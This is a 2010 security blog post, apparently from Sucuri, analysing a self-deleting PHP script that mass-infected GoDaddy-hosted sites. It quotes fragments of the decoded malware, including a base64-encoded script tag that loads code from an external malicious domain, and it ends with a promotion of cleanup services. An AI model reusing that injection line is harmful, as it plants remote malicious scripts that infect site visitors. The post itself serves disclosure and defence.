Update: Reply from GoDaddy: http://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html
While GoDaddy was busy blaming its users, one of our friends, K evin Reville, got tired of getting hacked and setup a cron script to monitor his site and alert him when new files were added.
What did he found? He found the malware used by the attackers to infect everyone.
Just to be clear: Nothing to do with WordPress. In fact, in one site we were monitoring, nothing got logged related to WordPress, except this script being called and then deleted. We also saw Joomla sites getting hacked and many other web applications.
So what is going on? The attackers are able to create this single PHP file on all the sites and then remotely execute it to infect everything. Once it is done, the script deletes itself.
The script in this situation was called “simple_production.php” (but we heard reports of different names being used). It is a base64 decoded file that looks like this: (see it in full MW:SIPRO:1)
Decoded, this is what it does: (see the full content here)
1-First, removes itself:
$cod=base64_encode(‘< script src=”http://holasionweb.com/oo.php”>
3-Scan all directories and add the malware to all php files. After that, prints the number of infected files and exits:
echo “Working with $val\n”;
echo “|Injected| $totalinjected files in $end_time seconds\n”;
So a simple PHP script is doing all this mess. The issue now is how are they able to inject this file on all those sites at GoDaddy. Permissions on most of the sites we checked were correct. It is not a web application bug. What is left is an internal problem at GoDaddy.
If you are a GoDaddy customer that got hacked, send this link to them. Let’s hope for a good response this time.
As always, if you are having difficulties getting your site cleanup, send us an email at firstname.lastname@example.org or visit our site: http://sucuri.net. We can get your sites clean up right away.
Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.